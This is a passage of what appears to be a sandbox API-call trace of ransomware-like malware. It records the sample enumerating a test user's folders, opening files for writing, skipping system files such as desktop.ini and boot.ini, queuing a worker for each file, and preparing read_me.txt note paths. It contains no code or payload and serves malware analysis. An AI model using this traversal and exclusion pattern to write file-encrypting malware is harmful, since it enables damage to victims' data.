FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0073.981] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned 44 [0073.981] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x770 [0073.981] StrStrW (lpFirst="ntuser.ini", lpSrch="read_me.txt") returned 0x0 [0073.981] StrStrW (lpFirst="ntuser.ini", lpSrch="autoexec.bat") returned 0x0 [0073.981] StrStrW (lpFirst="ntuser.ini", lpSrch="desktop.ini") returned 0x0 [0073.981] StrStrW (lpFirst="ntuser.ini", lpSrch="autorun.inf") returned 0x0 [0073.981] StrStrW (lpFirst="ntuser.ini", lpSrch="ntuser.dat") returned 0x0 [0073.981] StrStrW (lpFirst="ntuser.ini", lpSrch="iconcache.db") returned 0x0 [0073.981] StrStrW (lpFirst="ntuser.ini", lpSrch="bootsect.bak") returned 0x0 [0073.981] StrStrW (lpFirst="ntuser.ini", lpSrch="boot.ini") returned 0x0 [0073.981] StrStrW (lpFirst="ntuser.ini", lpSrch="ntuser.dat.log") returned 0x0 [0073.981] StrStrW (lpFirst="ntuser.ini", lpSrch="thumbs.db") returned 0x0 [0073.982] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 5 [0073.982] QueueUserWorkItem (Function=0x404e00, Context=0x770, Flags=0x0) returned 1 [0073.982] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf4c26af0, ftLastAccessTime.dwHighDateTime=0x1d59ffd, ftLastWriteTime.dwLowDateTime=0xf4c26af0, ftLastWriteTime.dwHighDateTime=0x1d59ffd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="Pictures", cAlternateFileName="")) returned 1 [0073.982] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned 42 [0073.982] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0073.982] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood") returned 43 [0073.982] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="Recent", cAlternateFileName="")) returned 1 [0073.982] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent") returned 40 [0073.982] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0073.982] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned 45 [0073.982] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="Searches", cAlternateFileName="")) returned 1 [0073.982] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned 42 [0073.982] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="SendTo", cAlternateFileName="")) returned 1 [0073.982] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo") returned 40 [0073.982] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0073.982] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu") returned 44 [0073.982] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0073.982] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates") returned 43 [0073.982] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf4bb46d0, ftLastAccessTime.dwHighDateTime=0x1d59ffd, ftLastWriteTime.dwLowDateTime=0xf4bb46d0, ftLastWriteTime.dwHighDateTime=0x1d59ffd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="Videos", cAlternateFileName="")) returned 1 [0073.982] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned 40 [0073.982] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf4bb46d0, ftLastAccessTime.dwHighDateTime=0x1d59ffd, ftLastWriteTime.dwLowDateTime=0xf4bb46d0, ftLastWriteTime.dwHighDateTime=0x1d59ffd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="Videos", cAlternateFileName="")) returned 0 [0073.982] FindClose (in: hFindFile=0x2b26b8 | out: hFindFile=0x2b26b8) returned 1 [0073.982] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\read_me.txt") returned 45 [0073.982] GetProcessHeap () returned 0x280000 [0073.982] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a900a8 | out: hHeap=0x280000) returned 1 [0073.982] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 35 [0073.982] GetProcessHeap () returned 0x280000 [0073.982] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ba0130 | out: hHeap=0x280000) returned 1 [0073.982] GetProcessHeap () returned 0x280000 [0073.982] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ba0130 [0073.983] wnsprintfW (in: pszDest=0x8ba0130, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*") returned 52 [0073.983] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf4bb46d0, ftLastAccessTime.dwHighDateTime=0x1d59ffd, ftLastWriteTime.dwLowDateTime=0xf4bb46d0, ftLastWriteTime.dwHighDateTime=0x1d59ffd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="Videos", cAlternateFileName="")) returned 0xffffffff [0073.983] wnsprintfW (in: pszDest=0x8ba0130, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\read_me.txt") returned 62 [0073.983] GetProcessHeap () returned 0x280000 [0073.983] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ba0130 | out: hHeap=0x280000) returned 1 [0073.983] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 36 [0073.983] GetProcessHeap () returned 0x280000 [0073.983] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x89e0050 | out: hHeap=0x280000) returned 1 [0073.987] GetProcessHeap () returned 0x280000 [0073.987] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x89e0050 [0073.988] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*") returned 44 [0073.988] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16a28970, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16a28970, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b26b8 [0073.988] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\.") returned 44 [0073.988] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16a28970, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16a28970, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.988] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\..") returned 45 [0073.988] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0073.988] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 66 [0073.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0074.006] StrStrW (lpFirst="aclviho asldjfl.contact", lpSrch="read_me.txt") returned 0x0 [0074.006] StrStrW (lpFirst="aclviho asldjfl.contact", lpSrch="autoexec.bat") returned 0x0 [0074.006] StrStrW (lpFirst="aclviho asldjfl.contact", lpSrch="desktop.ini") returned 0x0 [0074.007] StrStrW (lpFirst="aclviho asldjfl.contact", lpSrch="autorun.inf") returned 0x0 [0074.007] StrStrW (lpFirst="aclviho asldjfl.contact", lpSrch="ntuser.dat") returned 0x0 [0074.007] StrStrW (lpFirst="aclviho asldjfl.contact", lpSrch="iconcache.db") returned 0x0 [0074.007] StrStrW (lpFirst="aclviho asldjfl.contact", lpSrch="bootsect.bak") returned 0x0 [0074.007] StrStrW (lpFirst="aclviho asldjfl.contact", lpSrch="boot.ini") returned 0x0 [0074.007] StrStrW (lpFirst="aclviho asldjfl.contact", lpSrch="ntuser.dat.log") returned 0x0 [0074.007] StrStrW (lpFirst="aclviho asldjfl.contact", lpSrch="thumbs.db") returned 0x0 [0074.007] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 6 [0074.007] QueueUserWorkItem (Function=0x404e00, Context=0x7a8, Flags=0x0) returned 1 [0074.007] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0074.007] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned 64 [0074.007] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7bc [0074.007] StrStrW (lpFirst="administrator.contact", lpSrch="read_me.txt") returned 0x0 [0074.007] StrStrW (lpFirst="administrator.contact", lpSrch="autoexec.bat") returned 0x0 [0074.007] StrStrW (lpFirst="administrator.contact", lpSrch="desktop.ini") returned 0x0 [0074.007] StrStrW (lpFirst="administrator.contact", lpSrch="autorun.inf") returned 0x0 [0074.007] StrStrW (lpFirst="administrator.contact", lpSrch="ntuser.dat") returned 0x0 [0074.008] StrStrW (lpFirst="administrator.contact", lpSrch="iconcache.db") returned 0x0 [0074.008] StrStrW (lpFirst="administrator.contact", lpSrch="bootsect.bak") returned 0x0 [0074.008] StrStrW (lpFirst="administrator.contact", lpSrch="boot.ini") returned 0x0 [0074.008] StrStrW (lpFirst="administrator.contact", lpSrch="ntuser.dat.log") returned 0x0 [0074.008] StrStrW (lpFirst="administrator.contact", lpSrch="thumbs.db") returned 0x0 [0074.008] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 7 [0074.008] QueueUserWorkItem (Function=0x404e00, Context=0x7bc, Flags=0x0) returned 1 [0074.008] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0074.008] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned 64 [0074.008] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c0 [0074.008] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="read_me.txt") returned 0x0 [0074.008] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="autoexec.bat") returned 0x0 [0074.008] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="desktop.ini") returned 0x0 [0074.008] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="autorun.inf") returned 0x0 [0074.008] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="ntuser.dat") returned 0x0 [0074.008] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="iconcache.db") returned 0x0 [0074.008] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="bootsect.bak") returned 0x0 [0074.009] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="boot.ini") returned 0x0 [0074.009] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="ntuser.dat.log") returned 0x0 [0074.009] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch="thumbs.db") returned 0x0 [0074.009] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 8 [0074.009] QueueUserWorkItem (Function=0x404e00, Context=0x7c0, Flags=0x0) returned 1 [0074.009] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0074.009] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned 63 [0074.009] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x808 [0074.031] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="read_me.txt") returned 0x0 [0074.031] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="autoexec.bat") returned 0x0 [0074.031] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="desktop.ini") returned 0x0 [0074.031] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="autorun.inf") returned 0x0 [0074.031] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="ntuser.dat") returned 0x0 [0074.031] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="iconcache.db") returned 0x0 [0074.031] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="bootsect.bak") returned 0x0 [0074.031] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="boot.ini") returned 0x0 [0074.031] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="ntuser.dat.log") returned 0x0 [0074.031] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch="thumbs.db") returned 0x0 [0074.031] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 33 [0074.031] QueueUserWorkItem (Function=0x404e00, Context=0x808, Flags=0x0) returned 1 [0074.031] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0074.031] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned 54 [0074.032] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80c [0074.032] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0074.032] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0074.032] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0074.032] CloseHandle (hObject=0x80c) returned 1 [0074.032] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0074.032] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned 64 [0074.032] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80c [0074.054] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch="read_me.txt") returned 0x0 [0074.054] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch="autoexec.bat") returned 0x0 [0074.054] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch="desktop.ini") returned 0x0 [0074.054] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch="autorun.inf") returned 0x0 [0074.054] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch="ntuser.dat") returned 0x0 [0074.054] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch="iconcache.db") returned 0x0 [0074.054] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch="bootsect.bak") returned 0x0 [0074.054] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch="boot.ini") returned 0x0 [0074.054] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch="ntuser.dat.log") returned 0x0 [0074.054] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch="thumbs.db") returned 0x0 [0074.054] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 40 [0074.054] QueueUserWorkItem (Function=0x404e00, Context=0x80c, Flags=0x0) returned 1 [0074.054] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16a28970, ftCreationTime.dwHighDateTime=0x1d59ffe, 